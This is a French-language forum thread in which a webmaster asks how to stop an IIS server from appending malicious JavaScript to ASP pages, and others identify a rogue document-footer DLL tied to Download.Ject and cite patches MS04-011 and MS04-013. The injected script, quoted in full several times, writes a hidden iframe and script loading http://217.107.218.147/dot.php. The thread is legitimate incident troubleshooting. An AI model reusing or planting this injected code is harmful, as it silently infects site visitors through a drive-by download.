Twitter iPhone pliant OnePlus 11 PS5 Disney+ Orange Livebox Windows 11

Pb de Virus sur un serveur IIS

6 réponses
Avatar
Christophe KERHOUSSE
Bonjour, j'ai le Pb suivant :
Toutes les pages asp appelant un fichier js externe avec la balise :
<script type="text/javascript" language="JavaScript"
src="../Back-office/fonctions.js">

se voient rajouter le code suivant :

<script language="JavaScript">
<!--
var qxco7=document.cookie;

function gc099(n21) {
var ix=qxco7.indexOf(n21+"=");
if(ix==-1)return null;
ix=qxco7.indexOf("=",ix)+1;
var es=qxco7.indexOf(";",ix);
if(es==-1)es=qxco7.length;
return unescape(qxco7.substring(ix,es));
}

function sc088(n24,v8){
var today=new Date();
var expiry=new Date(today.getTime()+600000);
if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
expires="+expiry.toGMTString();qxco7=document.cookie;
}

function okx12(){
window.status="";
setTimeout("okx12()", 200);}okx12();
if(location.href.indexOf("https")!=0){
if(gc099("trk716")==null){
document.write("<script language=\"JavaScript\"
src=\"http://217.107.218.147/dot.php\"></script><iframe
src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\"
scrolling=\"no\" frameborder=\"no\"/>");
sc088("trk716","4");
}
}

// -->

</script>

et ce script appelle dans un iframe une page qui vous infecte du virus
Download.Ject !!!!!

Mon soucis : ou chercher dans IIS afin de virer cet ajout automatique de
code !!!

Merci d'avance.

6 réponses

Avatar
Yann-Loïc
Bonjour,

Y aurait il un filtre ISAPI suspect ou un programme résident en mémoire dans
le gestionnaire de tâche?

Yann-Loïc
--
This posting is provided "AS IS" with no warranties, and confers no rights.

"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in
message news:%
Bonjour, j'ai le Pb suivant :
Toutes les pages asp appelant un fichier js externe avec la balise :
<script type="text/javascript" language="JavaScript"
src="../Back-office/fonctions.js">

se voient rajouter le code suivant :

<script language="JavaScript">
<!--
var qxco7=document.cookie;

function gc099(n21) {
var ix=qxco7.indexOf(n21+"=");
if(ix==-1)return null;
ix=qxco7.indexOf("=",ix)+1;
var es=qxco7.indexOf(";",ix);
if(es==-1)es=qxco7.length;
return unescape(qxco7.substring(ix,es));
}

function sc088(n24,v8){
var today=new Date();
var expiry=new Date(today.getTime()+600000);
if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
expires="+expiry.toGMTString();qxco7=document.cookie;
}

function okx12(){
window.status="";
setTimeout("okx12()", 200);}okx12();
if(location.href.indexOf("https")!=0){
if(gc099("trk716")==null){
document.write("<script language="JavaScript"
src="http://217.107.218.147/dot.php"></script><iframe
src="http://217.107.218.147/dot.php" height="1" width="1"
scrolling="no" frameborder="no"/>");
sc088("trk716","4");
}
}

// -->

</script>

et ce script appelle dans un iframe une page qui vous infecte du virus
Download.Ject !!!!!

Mon soucis : ou chercher dans IIS afin de virer cet ajout automatique de
code !!!

Merci d'avance.




Avatar
burkejon2002
There has been a program installed and executed on your server that
enables documentfooter dll's to all your sites. That dll contains the
exploit javascript code that creates a virus warning for your
visitors. Go ahaed and uncheck use documentfooter and delete the
refering dlls. Scan for trojan's on the server as well

/burkejon

"Yann-Loïc" wrote in message news:...
Bonjour,

Y aurait il un filtre ISAPI suspect ou un programme résident en mémoire dans
le gestionnaire de tâche?

Yann-Loïc
--
This posting is provided "AS IS" with no warranties, and confers no rights.

"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in
message news:%
> Bonjour, j'ai le Pb suivant :
> Toutes les pages asp appelant un fichier js externe avec la balise :
> <script type="text/javascript" language="JavaScript"
> src="../Back-office/fonctions.js">
>
> se voient rajouter le code suivant :
>
> <script language="JavaScript">
> <!--
> var qxco7=document.cookie;
>
> function gc099(n21) {
> var ix=qxco7.indexOf(n21+"=");
> if(ix==-1)return null;
> ix=qxco7.indexOf("=",ix)+1;
> var es=qxco7.indexOf(";",ix);
> if(es==-1)es=qxco7.length;
> return unescape(qxco7.substring(ix,es));
> }
>
> function sc088(n24,v8){
> var today=new Date();
> var expiry=new Date(today.getTime()+600000);
> if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
> expires="+expiry.toGMTString();qxco7=document.cookie;
> }
>
> function okx12(){
> window.status="";
> setTimeout("okx12()", 200);}okx12();
> if(location.href.indexOf("https")!=0){
> if(gc099("trk716")==null){
> document.write("<script language="JavaScript"
> src="http://217.107.218.147/dot.php"></script><iframe
> src="http://217.107.218.147/dot.php" height="1" width="1"
> scrolling="no" frameborder="no"/>");
> sc088("trk716","4");
> }
> }
>
> // -->
>
> </script>
>
> et ce script appelle dans un iframe une page qui vous infecte du virus
> Download.Ject !!!!!
>
> Mon soucis : ou chercher dans IIS afin de virer cet ajout automatique de
> code !!!
>
> Merci d'avance.
>
>


Avatar
Christophe KERHOUSSE
Merci à vous deux, le soucis était bien un footer ajouté automatiquement.
Avatar
Yann-Loïc
Pour l'instant il semble que si le serveur IIS n'a pas MS04-011, il est
vulnérable à ce virus.

www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Le code diffusé par le footer touche ensuite Internet Explorer si MS04-013
n'est pas
installé:

www.microsoft.com/technet/security/bulletin/ms04-013.mspx.

Yann-Loïc
--
This posting is provided "AS IS" with no warranties, and confers no rights.


"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in
message news:
Merci à vous deux, le soucis était bien un footer ajouté automatiquement.




Avatar
Christophe KERHOUSSE
Merci Yann-Loïc pour ces précisions.
J'ai fait suivre à mon hébergeur car en fait je n'ai pas la main sur le
serveur infecté et le support est nul à ch...

Ils m'avaient dit dans un premier temps que tout était OK sur le IIS chez
eux avant que je les mettes sur la piste (grâce aux réponse de ce forum) ...

No Comment...
Avatar
Yann-Loïc
Les articles officiels sont sur notre site:
http://www.microsoft.com/security/incident/download_ject.mspx
http://support.microsoft.com/?kbid‡1277
http://www.microsoft.com/presspass/press/2004/jun04/0625download-jectstatement.asp

--
This posting is provided "AS IS" with no warranties, and confers no rights.

"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in
message news:
Merci Yann-Loïc pour ces précisions.
J'ai fait suivre à mon hébergeur car en fait je n'ai pas la main sur le
serveur infecté et le support est nul à ch...

Ils m'avaient dit dans un premier temps que tout était OK sur le IIS chez
eux avant que je les mettes sur la piste (grâce aux réponse de ce forum)


...

No Comment...